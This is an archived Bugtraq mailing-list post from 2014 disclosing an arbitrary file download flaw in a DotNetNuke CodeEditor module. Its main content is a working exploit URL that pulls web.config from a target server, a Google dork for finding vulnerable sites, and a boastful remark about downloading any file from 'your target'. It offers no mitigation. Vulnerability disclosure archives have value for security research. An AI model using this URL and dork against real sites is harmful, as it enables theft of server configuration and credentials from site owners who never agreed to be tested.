| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201406090525.s595Pt6n019970@sf01web3.securityfocus.com> Date: Mon, 9 Jun 2014 05:25:55 GMT From: cseye_ut@...oo.com To: bugtraq@...urityfocus.com Subject: DNN (DotNetNukeŽ) CodeEditor Module Arbitrary File Download Vulnerability #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Title : DNN (DotNetNukeŽ) CodeEditor Module Arbitrary File Download Vulnerability # Author : alieye # vendor : http://www.mediaant.com/ , http://store.dnnsoftware.com/ # Contact : cseye_ut@...oo.com # Risk : High # Class: Remote # Google Dork: inurl:/DNNCodeEditor/ # Version: all version # Date: 09/06/2014 # os : windows server 2008 #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ You can download any file from your target ;) Exploit : http://victim.com/DesktopModules/DNNCodeEditor/DNNCodeEditorDownload.aspx?ID=/web.config #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members [#] Thanks To All Iranian Hackers [#] website : http://cseye.vcp.ir/ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Powered by blists - more mailing lists